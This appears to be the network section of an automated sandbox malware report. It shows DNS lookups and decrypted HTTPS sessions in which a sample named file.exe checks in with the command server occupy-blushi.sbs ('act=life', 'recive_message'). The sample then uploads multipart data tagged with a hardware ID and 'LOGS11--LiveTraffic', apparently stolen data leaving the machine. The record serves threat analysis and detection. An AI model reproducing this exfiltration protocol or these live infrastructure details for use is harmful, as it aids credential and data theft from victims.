Nov 25, 2024 23:34:07.547818899 CET	1.1.1.1	192.168.2.7	0x1acb	Name error (3)	property-imper.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 25, 2024 23:34:08.036232948 CET	1.1.1.1	192.168.2.7	0x6a19	Name error (3)	frogs-severz.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 25, 2024 23:34:08.358052969 CET	1.1.1.1	192.168.2.7	0x1145	No error (0)	occupy-blushi.sbs		172.67.187.240	A (IP address)	IN (0x0001)	false
Nov 25, 2024 23:34:08.358052969 CET	1.1.1.1	192.168.2.7	0x1145	No error (0)	occupy-blushi.sbs		104.21.7.169	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

occupy-blushi.sbs

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	172.67.187.240	443	5380	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 22:34:09 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: occupy-blushi.sbs
2024-11-25 22:34:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-25 22:34:10 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 22:34:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=431teoj8nhv23445jpolu27kld; expires=Fri, 21-Mar-2025 16:20:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DN9p6BpCwRmrFCubBSnzVv096uAjBK%2FKj%2FPt2AxbL9Q3dxoEQ2nW%2Ftt8%2FemsSpB7frtw4Vh%2Fuu6z6xSfOUzbHtqeN0wS5kq59OKyBfQd1eMoCRNqFolFf1VbAlgUbXKfa%2FjdpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e851ac3f9bc8c6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1929&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1481481&cwnd=143&unsent_bytes=0&cid=681ec576370156dd&ts=749&x=0"
2024-11-25 22:34:10 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-25 22:34:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	172.67.187.240	443	5380	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 22:34:11 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: occupy-blushi.sbs
2024-11-25 22:34:11 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-25 22:34:12 UTC	1051	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 22:34:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=amodecvs058vgjf1bhv9rk5n1l; expires=Fri, 21-Mar-2025 16:20:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DuzT%2BqRB%2F%2FiNwrxK5XSTcOtdMlguIYsHSnN1s8E%2BXUU9jBBrXcDIEWVe8TTNq6v%2B0wepERbdhzWJ5uynux1a0%2F56lh5DygcmtecXxONPFsTmU58YiooCai%2FGnhx7JBNkbVP%2Fyw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e851ad209ad43fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1634&rtt_var=626&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=954&delivery_rate=1730883&cwnd=241&unsent_bytes=0&cid=c53daf968a0f1cb0&ts=1108&x=0"
2024-11-25 22:34:12 UTC	318	IN	Data Raw: 34 34 36 63 0d 0a 42 68 36 6f 34 45 67 4a 54 78 59 54 38 71 77 72 41 62 59 45 42 61 53 2b 72 32 4e 54 64 6f 69 33 79 61 6d 38 33 69 48 74 78 48 6c 39 50 4e 37 43 63 6a 31 6a 4e 47 43 58 6a 68 46 31 78 48 46 67 69 4a 7a 4f 42 33 46 4d 37 74 61 6c 32 74 6e 79 41 35 75 70 57 7a 78 34 79 59 77 37 62 47 4d 30 64 6f 71 4f 45 56 72 4e 4a 6d 44 4b 6e 4a 56 42 4e 68 7a 71 31 71 58 4c 33 62 56 4f 6e 61 67 61 62 6e 4c 50 69 43 31 71 4b 33 64 2f 6e 38 6c 4f 5a 4e 64 75 61 38 33 54 78 77 35 78 57 71 72 53 73 34 75 47 2f 47 79 49 73 42 68 4c 66 39 75 4c 61 6e 52 6a 62 54 47 58 77 67 6b 37 6c 47 56 67 78 74 4c 4a 42 7a 67 65 34 4e 2b 74 79 74 69 30 55 59 53 69 45 57 35 38 7a 49 6b 6e 59 7a 39 36 64 5a 6a 43 53 47 37 58 4a 69 6d 47 32 39 56 42 61 56 53 35 35 36 6a 61 7a Data Ascii: 446cBh6o4EgJTxYT8qwrAbYEBaS+r2NTdoi3yam83iHtxHl9PN7Ccj1jNGCXjhF1xHFgiJzOB3FM7tal2tnyA5upWzx4yYw7bGM0doqOEVrNJmDKnJVBNhzq1qXL3bVOnagabnLPiC1qK3d/n8lOZNdua83Txw5xWqrSs4uG/GyIsBhLf9uLanRjbTGXwgk7lGVgxtLJBzge4N+tyti0UYSiEW58zIknYz96dZjCSG7XJimG29VBaVS556jaz
2024-11-25 22:34:12 UTC	1369	IN	Data Raw: 67 41 6c 6b 7a 43 59 2f 68 76 7a 64 41 6a 49 41 35 38 54 72 31 4a 43 6c 41 34 69 71 57 7a 77 38 7a 49 77 72 5a 69 31 6d 65 5a 76 46 54 48 48 66 62 32 72 4c 33 4d 41 4c 50 68 66 71 30 71 48 42 30 62 5a 48 67 71 73 64 5a 48 79 4b 7a 47 70 73 4e 54 51 70 30 4f 31 4d 63 39 4e 71 63 59 54 6d 6a 52 35 2f 44 61 72 53 70 34 75 47 2f 45 75 4b 70 52 68 76 63 38 6d 4b 49 58 6b 74 5a 6e 65 64 79 31 74 6c 30 57 68 74 78 63 37 48 44 7a 63 58 34 39 36 69 7a 74 6d 34 41 38 48 6d 48 48 77 38 6b 73 49 4c 5a 69 5a 34 65 34 66 4f 43 58 79 61 66 79 66 42 30 49 31 5a 63 52 44 72 30 61 72 50 30 4c 4a 48 67 36 41 56 61 58 50 4d 69 43 70 73 4a 33 78 35 6b 63 4e 43 62 4e 52 6a 61 73 4c 61 77 51 41 30 56 4b 53 56 72 4e 4f 65 35 41 4f 68 6f 52 68 32 50 76 2b 42 4a 47 55 71 59 6a 47 Data Ascii: gAlkzCY/hvzdAjIA58Tr1JClA4iqWzw8zIwrZi1meZvFTHHfb2rL3MALPhfq0qHB0bZHgqsdZHyKzGpsNTQp0O1Mc9NqcYTmjR5/DarSp4uG/EuKpRhvc8mKIXktZnedy1tl0Whtxc7HDzcX496iztm4A8HmHHw8ksILZiZ4e4fOCXyafyfB0I1ZcRDr0arP0LJHg6AVaXPMiCpsJ3x5kcNCbNRjasLawQA0VKSVrNOe5AOhoRh2Pv+BJGUqYjG
2024-11-25 22:34:12 UTC	1369	IN	Data Raw: 39 31 74 62 4d 44 63 7a 41 74 78 57 71 72 53 73 34 75 47 2f 48 65 49 71 68 5a 72 50 76 2b 42 4a 47 55 71 59 6a 47 50 67 46 41 6a 30 32 6f 6e 6e 70 7a 42 43 44 45 66 34 4e 47 72 7a 4e 4f 35 51 49 69 6c 46 6d 4e 32 78 49 55 75 5a 79 52 35 64 35 44 4a 54 57 62 47 59 32 37 4b 30 49 31 50 63 52 50 79 6c 66 4f 4c 38 62 74 56 6a 49 6b 59 64 58 57 4b 6e 57 52 79 62 58 4e 39 30 4a 59 4a 5a 4e 46 75 62 4d 44 55 7a 52 4d 30 47 75 48 55 6f 63 33 66 73 55 2b 4a 70 68 70 6b 65 73 61 43 4c 57 77 2f 5a 6e 53 57 33 45 4d 6a 6d 69 5a 67 33 70 79 56 51 51 63 45 2f 63 53 39 69 65 75 2f 54 59 47 68 44 53 52 6a 68 4a 74 71 62 43 45 30 4b 64 44 46 53 57 2f 54 62 6d 48 43 31 4d 49 4f 4f 41 62 72 32 61 58 5a 32 62 78 4b 67 61 6b 58 62 58 48 4e 6a 79 46 68 49 48 42 32 6b 59 34 48 Data Ascii: 91tbMDczAtxWqrSs4uG/HeIqhZrPv+BJGUqYjGPgFAj02onnpzBCDEf4NGrzNO5QIilFmN2xIUuZyR5d5DJTWbGY27K0I1PcRPylfOL8btVjIkYdXWKnWRybXN90JYJZNFubMDUzRM0GuHUoc3fsU+JphpkesaCLWw/ZnSW3EMjmiZg3pyVQQcE/cS9ieu/TYGhDSRjhJtqbCE0KdDFSW/TbmHC1MIOOAbr2aXZ2bxKgakXbXHNjyFhIHB2kY4H
2024-11-25 22:34:12 UTC	1369	IN	Data Raw: 2b 47 30 4d 4d 42 50 68 6a 6d 33 71 50 4b 30 72 4a 45 69 71 38 54 62 47 37 4c 68 69 4a 71 49 33 74 77 6c 4d 74 4d 5a 39 4e 69 59 63 6d 63 67 30 45 32 44 4b 71 4e 36 2b 54 35 69 51 47 75 6e 46 74 37 4d 74 50 43 4c 57 64 74 4c 44 47 63 7a 55 56 72 32 32 42 75 79 74 62 45 43 6a 30 66 37 74 6d 69 7a 74 69 39 52 6f 71 6e 48 32 68 32 7a 49 45 70 5a 43 4a 37 65 64 43 41 43 57 54 4d 4a 6a 2b 47 2b 64 6f 4b 50 78 4b 71 79 75 58 53 6e 72 74 50 7a 2f 35 62 61 48 58 4d 68 43 39 6e 4c 48 4a 35 6c 63 5a 4e 59 74 4a 67 5a 4d 6e 59 79 41 41 2b 45 4f 62 62 6f 63 72 66 73 45 69 41 72 52 34 6b 4d 6f 71 46 4d 69 74 31 4e 45 43 54 32 46 35 7a 32 43 5a 34 69 4d 57 4e 42 6a 31 55 73 70 57 71 32 64 53 32 54 59 71 70 48 6d 64 7a 7a 59 38 73 5a 79 64 39 65 5a 62 42 51 48 48 58 61 Data Ascii: +G0MMBPhjm3qPK0rJEiq8TbG7LhiJqI3twlMtMZ9NiYcmcg0E2DKqN6+T5iQGunFt7MtPCLWdtLDGczUVr22BuytbECj0f7tmizti9RoqnH2h2zIEpZCJ7edCACWTMJj+G+doKPxKqyuXSnrtPz/5baHXMhC9nLHJ5lcZNYtJgZMnYyAA+EObbocrfsEiArR4kMoqFMit1NECT2F5z2CZ4iMWNBj1UspWq2dS2TYqpHmdzzY8sZyd9eZbBQHHXa
2024-11-25 22:34:12 UTC	1369	IN	Data Raw: 4a 44 44 45 47 35 64 4b 73 77 74 57 75 53 59 69 68 45 47 78 33 78 59 51 34 5a 79 4e 6d 64 49 4c 63 43 53 32 55 59 58 2b 47 68 49 30 33 4e 67 54 36 31 75 6e 36 79 4c 39 56 68 4b 73 58 4a 47 4f 45 6d 32 70 73 49 54 51 70 30 4d 68 47 61 74 64 70 5a 73 2f 51 77 41 51 34 45 65 76 54 72 38 48 55 76 45 57 4a 70 78 35 75 66 38 75 49 49 32 77 6c 63 33 4b 43 6a 67 63 6a 30 33 34 6e 6e 70 7a 6b 42 69 4d 61 2b 70 57 30 68 63 66 38 52 49 50 6d 51 79 52 34 77 49 30 75 62 43 46 79 64 4a 62 44 53 47 7a 56 5a 6d 6a 43 31 38 51 48 4d 42 6e 76 32 4b 2f 5a 31 4c 64 4d 67 36 38 58 61 54 79 45 77 69 31 7a 62 53 77 78 6f 63 4e 48 62 64 4e 77 4a 39 6d 53 31 45 45 32 47 4b 71 4e 36 38 72 53 73 30 43 41 70 52 68 6c 64 74 69 51 4a 6d 49 6c 63 58 32 62 77 45 39 78 30 6d 6c 75 78 64 Data Ascii: JDDEG5dKswtWuSYihEGx3xYQ4ZyNmdILcCS2UYX+GhI03NgT61un6yL9VhKsXJGOEm2psITQp0MhGatdpZs/QwAQ4EevTr8HUvEWJpx5uf8uII2wlc3KCjgcj034nnpzkBiMa+pW0hcf8RIPmQyR4wI0ubCFydJbDSGzVZmjC18QHMBnv2K/Z1LdMg68XaTyEwi1zbSwxocNHbdNwJ9mS1EE2GKqN68rSs0CApRhldtiQJmIlcX2bwE9x0mluxd
2024-11-25 22:34:12 UTC	1369	IN	Data Raw: 56 4b 53 56 75 73 7a 50 2f 42 75 5a 74 67 78 6a 59 34 53 62 61 6d 77 68 4e 43 6e 51 79 45 42 6c 30 32 42 70 31 4e 6e 4c 44 6a 34 64 34 39 47 6a 79 4e 36 34 52 34 69 6a 47 47 68 33 7a 59 45 6c 62 79 52 36 65 4a 2b 4f 42 79 50 54 66 69 65 65 6e 4f 77 61 4d 68 6a 6e 6c 62 53 46 78 2f 78 45 67 2b 5a 44 4a 48 44 45 68 79 70 68 4b 33 42 30 6c 73 52 4d 59 39 39 6c 61 4d 4c 61 79 51 34 78 48 2b 50 55 72 63 37 55 74 30 57 43 70 52 31 69 50 49 54 43 4c 58 4e 74 4c 44 47 77 31 55 52 76 30 79 5a 34 69 4d 57 4e 42 6a 31 55 73 70 57 67 78 39 71 37 51 34 4b 6c 45 32 46 34 77 49 63 71 59 7a 39 38 63 5a 66 63 57 32 50 64 59 32 76 46 33 4d 6b 48 4f 42 4c 70 30 65 75 46 6e 72 74 62 7a 2f 35 62 53 58 44 4e 71 79 31 77 62 57 73 2f 69 59 35 4f 62 35 51 2b 4a 38 66 58 78 77 34 Data Ascii: VKSVuszP/BuZtgxjY4SbamwhNCnQyEBl02Bp1NnLDj4d49GjyN64R4ijGGh3zYElbyR6eJ+OByPTfieenOwaMhjnlbSFx/xEg+ZDJHDEhyphK3B0lsRMY99laMLayQ4xH+PUrc7Ut0WCpR1iPITCLXNtLDGw1URv0yZ4iMWNBj1UspWgx9q7Q4KlE2F4wIcqYz98cZfcW2PdY2vF3MkHOBLp0euFnrtbz/5bSXDNqy1wbWs/iY5Ob5Q+J8fXxw4
2024-11-25 22:34:12 UTC	1369	IN	Data Raw: 2b 76 4b 6e 75 52 36 6c 75 59 4e 4a 43 53 59 7a 47 70 35 62 53 77 78 31 38 31 62 63 64 4a 6c 63 63 57 62 38 7a 38 57 41 75 44 53 75 38 7a 4a 73 77 50 42 35 68 51 6b 4a 50 50 43 49 32 77 32 5a 57 65 64 33 6b 34 6a 36 79 67 6e 33 70 79 56 51 51 51 58 35 4e 75 73 33 63 2f 78 5a 4a 6d 73 48 48 52 37 33 59 31 71 4a 57 31 79 4d 63 69 64 42 79 50 51 64 79 65 65 6a 4a 39 61 5a 45 65 39 68 66 6e 55 6b 4b 55 44 6d 65 5a 44 4e 6a 4b 4b 6b 47 6f 7a 62 54 4e 79 67 74 78 50 59 4d 4a 6c 49 50 6a 69 36 68 73 38 45 76 33 45 6c 66 58 5a 70 6b 36 4a 73 51 6f 6f 61 63 6d 4d 4a 47 77 37 4e 44 2f 51 77 51 6b 37 37 53 59 76 68 75 4f 44 51 53 6c 55 73 70 57 65 79 4e 43 79 52 4a 6d 33 56 6b 4e 6d 78 34 51 39 65 6d 30 36 4d 5a 61 4f 45 54 4f 61 4a 6d 50 58 6e 4a 56 52 59 30 2b 2f Data Ascii: +vKnuR6luYNJCSYzGp5bSwx181bcdJlccWb8z8WAuDSu8zJswPB5hQkJPPCI2w2ZWed3k4j6ygn3pyVQQQX5Nus3c/xZJmsHHR73Y1qJW1yMcidByPQdyeejJ9aZEe9hfnUkKUDmeZDNjKKkGozbTNygtxPYMJlIPji6hs8Ev3ElfXZpk6JsQooacmMJGw7ND/QwQk77SYvhuODQSlUspWeyNCyRJm3VkNmx4Q9em06MZaOETOaJmPXnJVRY0+/
2024-11-25 22:34:13 UTC	1369	IN	Data Raw: 36 72 54 4c 47 59 44 6d 64 79 78 49 55 38 65 6d 30 36 4d 5a 2b 4f 45 56 71 55 4c 69 66 35 6b 6f 30 5a 63 55 79 71 34 4b 6a 46 30 4c 74 56 6e 75 73 38 61 6e 76 4c 6c 44 70 38 49 6a 51 2f 30 4d 67 4a 4f 34 59 6f 4a 38 4c 4e 6a 56 6c 68 52 72 47 41 2b 4a 79 4f 37 6c 7a 42 76 31 74 79 50 4a 4c 51 5a 43 73 2f 4e 43 6e 51 69 55 70 78 78 6d 42 6b 30 4e 2b 4b 50 77 38 7a 35 4e 4b 71 33 63 36 72 54 4d 43 49 4c 55 56 43 39 4a 63 70 5a 53 4e 7a 5a 34 47 4f 42 79 50 62 4a 6a 2f 2f 6e 49 56 42 44 6c 71 71 7a 65 75 54 6e 6f 6c 41 67 61 67 63 63 6d 32 48 70 53 52 73 4c 47 4a 68 68 38 45 47 54 65 4a 48 4a 34 69 63 79 30 46 70 52 71 53 56 72 39 71 65 35 42 50 64 2f 55 34 33 4b 35 72 51 4e 53 55 30 4e 47 66 51 6c 68 73 74 6c 48 51 6e 6e 70 79 4b 41 69 4d 47 37 4e 61 39 79 Data Ascii: 6rTLGYDmdyxIU8em06MZ+OEVqULif5ko0ZcUyq4KjF0LtVnus8anvLlDp8IjQ/0MgJO4YoJ8LNjVlhRrGA+JyO7lzBv1tyPJLQZCs/NCnQiUpxxmBk0N+KPw8z5NKq3c6rTMCILUVC9JcpZSNzZ4GOByPbJj//nIVBDlqqzeuTnolAgagccm2HpSRsLGJhh8EGTeJHJ4icy0FpRqSVr9qe5BPd/U43K5rQNSU0NGfQlhstlHQnnpyKAiMG7Na9y
2024-11-25 22:34:13 UTC	1369	IN	Data Raw: 50 2f 6c 73 6a 63 73 65 44 4b 57 55 75 5a 6d 4f 57 7a 56 39 67 6b 31 68 5a 36 38 37 4b 45 54 4a 57 32 39 69 76 33 63 75 2f 55 34 69 59 4a 55 6c 75 7a 5a 49 70 4b 51 46 7a 66 4a 7a 77 64 31 54 46 59 58 65 45 2b 73 34 58 4d 6c 53 6b 6c 62 4f 4c 68 76 78 75 6e 61 45 4c 5a 7a 37 6d 68 53 64 6e 62 57 73 2f 69 59 35 66 49 34 77 31 4b 59 62 4f 6a 56 6c 78 55 2b 6e 48 75 63 33 64 71 6b 44 49 6d 43 56 4a 62 73 32 53 4b 53 6b 63 65 58 57 47 32 30 70 7a 30 31 68 5a 36 38 37 4b 45 54 4a 57 7a 2b 2f 70 2b 73 69 2f 51 34 47 68 57 79 6f 38 30 73 4a 79 4b 77 42 6d 64 6f 44 4e 43 30 62 75 4a 46 62 51 33 38 30 50 4e 6c 54 31 6d 37 4b 4c 79 50 77 62 33 4f 68 62 64 6a 79 53 77 6d 31 6c 49 48 56 79 6e 73 31 62 63 64 4a 6c 63 63 57 62 38 7a 38 65 48 2b 76 46 70 74 72 54 75 46 Data Ascii: P/lsjcseDKWUuZmOWzV9gk1hZ687KETJW29iv3cu/U4iYJUluzZIpKQFzfJzwd1TFYXeE+s4XMlSklbOLhvxunaELZz7mhSdnbWs/iY5fI4w1KYbOjVlxU+nHuc3dqkDImCVJbs2SKSkceXWG20pz01hZ687KETJWz+/p+si/Q4GhWyo80sJyKwBmdoDNC0buJFbQ380PNlT1m7KLyPwb3OhbdjySwm1lIHVyns1bcdJlccWb8z8eH+vFptrTuF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49703	172.67.187.240	443	5380	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 22:34:14 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8AE9VENNN7RYOCYOZ7P User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12856 Host: occupy-blushi.sbs
2024-11-25 22:34:14 UTC	12856	OUT	Data Raw: 2d 2d 38 41 45 39 56 45 4e 4e 4e 37 52 59 4f 43 59 4f 5a 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 42 34 33 37 32 43 33 31 45 39 31 42 38 44 42 30 38 30 39 38 39 45 46 35 46 45 39 32 46 46 0d 0a 2d 2d 38 41 45 39 56 45 4e 4e 4e 37 52 59 4f 43 59 4f 5a 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 41 45 39 56 45 4e 4e 4e 37 52 59 4f 43 59 4f 5a 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --8AE9VENNN7RYOCYOZ7PContent-Disposition: form-data; name="hwid"39B4372C31E91B8DB080989EF5FE92FF--8AE9VENNN7RYOCYOZ7PContent-Disposition: form-data; name="pid"2--8AE9VENNN7RYOCYOZ7PContent-Disposition: form-data; name="lid"LOGS11--Li
2024-11-25 22:34:15 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 22:34:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cnhlbo2s0q5rt3g711svte806u; expires=Fri, 21-Mar-2025 16:20:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XafVU7hTb1fvFsawC4ryEa90a3C6tKVWMTC%2FFr013TvfgzlG9MgH7aAtb8Bc8vmEw7Gs%2BCnBv3CVSzOWanHuuJAR85S0MHvHMXLOxwSiuPhhw1hD1DnmRIllTHlQNFHPtuxjGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e851ae37fd142b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1799&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13798&delivery_rate=1623123&cwnd=250&unsent_bytes=0&cid=ba1d44afc1ddd7bf&ts=1022&x=0"
2024-11-25 22:34:15 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-25 22:34:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49709	172.67.187.240	443	5380	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 22:34:17 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=63DCI6ZSNTA8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15046 Host: occupy-blushi.sbs
2024-11-25 22:34:17 UTC	15046	OUT	Data Raw: 2d 2d 36 33 44 43 49 36 5a 53 4e 54 41 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 42 34 33 37 32 43 33 31 45 39 31 42 38 44 42 30 38 30 39 38 39 45 46 35 46 45 39 32 46 46 0d 0a 2d 2d 36 33 44 43 49 36 5a 53 4e 54 41 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 33 44 43 49 36 5a 53 4e 54 41 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 36 33 44 43 49 36 5a 53 Data Ascii: --63DCI6ZSNTA8Content-Disposition: form-data; name="hwid"39B4372C31E91B8DB080989EF5FE92FF--63DCI6ZSNTA8Content-Disposition: form-data; name="pid"2--63DCI6ZSNTA8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--63DCI6ZS
2024-11-25 22:34:18 UTC	1020	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 22:34:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2gra509dlsj8qf14vp0h8coc3f; expires=Fri, 21-Mar-2025 16:20:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GMeMQLyJdshj16nJqPLQKWn0j%2BngZldWIWPhem6M1wqX1NNuLNP2hY7uk8Ac1aslV5H1IRq6qRyQWgW4kpqARHJot%2B3TUEPLq23MfjkP6PHDguewlY3WTsk%2FrwE8wAK5zlzj%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e851af27a8619aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1791&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15981&delivery_rate=1567364&cwnd=32&unsent_bytes=0&cid=06845a92af75e85d&ts=985&x=0"
2024-11-25 22:34:18 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-25 22:34:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49715	172.67.187.240	443	5380	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 22:34:19 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SIWABCLOLDE61L User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20383 Host: occupy-blushi.sbs
2024-11-25 22:34:19 UTC	15331	OUT	Data Raw: 2d 2d 53 49 57 41 42 43 4c 4f 4c 44 45 36 31 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 42 34 33 37 32 43 33 31 45 39 31 42 38 44 42 30 38 30 39 38 39 45 46 35 46 45 39 32 46 46 0d 0a 2d 2d 53 49 57 41 42 43 4c 4f 4c 44 45 36 31 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 49 57 41 42 43 4c 4f 4c 44 45 36 31 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 